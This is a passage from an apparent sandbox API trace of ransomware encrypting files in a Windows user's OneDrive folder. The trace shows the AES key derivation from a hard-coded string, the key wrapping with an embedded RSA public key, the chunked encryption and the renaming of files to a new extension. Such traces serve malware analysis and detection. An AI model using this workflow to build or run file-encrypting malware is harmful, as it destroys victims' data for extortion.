hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2d9b8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f2d9b8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0280.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2d9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f2d9b8*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0280.406] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.423] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0280.424] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.425] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.425] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0280.425] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.426] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.426] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0280.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.426] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.426] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0280.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.426] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.426] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0280.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.426] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.426] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0280.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.426] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.426] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0280.427] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0280.427] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0280.427] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x80, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x90) returned 1 [0280.427] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x90, lpOverlapped=0x0) returned 1 [0280.427] CloseHandle (hObject=0x5d48) returned 1 [0280.427] CloseHandle (hObject=0x5d3c) returned 1 [0280.427] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\LoadingPage.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\loadingpage.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\LoadingPage.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\loadingpage.html"), bFailIfExists=0) returned 1 [0280.430] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\LoadingPage.html", dwFileAttributes=0x0) returned 1 [0280.431] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\LoadingPage.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\loadingpage.html.gsg")) returned 1 [0280.432] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\LoadingPage.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\loadingpage.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\LoadingPage.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\loadingpage.html.fuck")) returned 1 [0280.433] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0280.433] CryptDestroyKey (hKey=0x2fa748) returned 1 [0280.433] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0280.434] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0280.434] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0280.434] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0280.434] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0280.434] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0280.434] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0280.434] GetLastError () returned 0x0 [0280.434] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lt\\filesync.localizedresources.dll.mui")) returned 0x20 [0280.434] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0280.435] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lt\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0280.436] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lt\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d68 [0280.437] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lt\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0280.437] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1eb30) returned 1 [0280.440] CryptCreateHash (in: hProv=0x2f1eb30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0280.440] lstrlenA (lpString="TXNdkJRdVYjLbGOsIhrFFzdHzMlQm") returned 29 [0280.440] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0280.440] CryptDeriveKey (in: hProv=0x2f1eb30, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc3c8) returned 1 [0280.440] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0280.440] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0280.440] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1e2b0) returned 1 [0280.440] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1e2b0, dwCertEncodingType=0x1, pInfo=0x2f367a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f367d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f367d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc648) returned 1 [0280.441] CryptEncrypt (in: hKey=0x2fc648, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0280.441] CryptEncrypt (in: hKey=0x2fc648, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1e558*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1e558*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0280.441] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f1e558*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1e558*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0280.442] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.444] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.445] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.446] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.447] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.447] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.448] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.448] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.448] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.448] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.448] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.448] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.448] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.448] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.448] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.448] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.448] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.448] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.448] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.449] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.449] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.449] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.449] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.449] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.449] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.449] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.449] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.449] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.449] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.449] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.449] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.450] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.450] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.450] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.450] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.450] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.450] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.450] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.450] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.450] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.450] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.450] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.450] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.451] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, 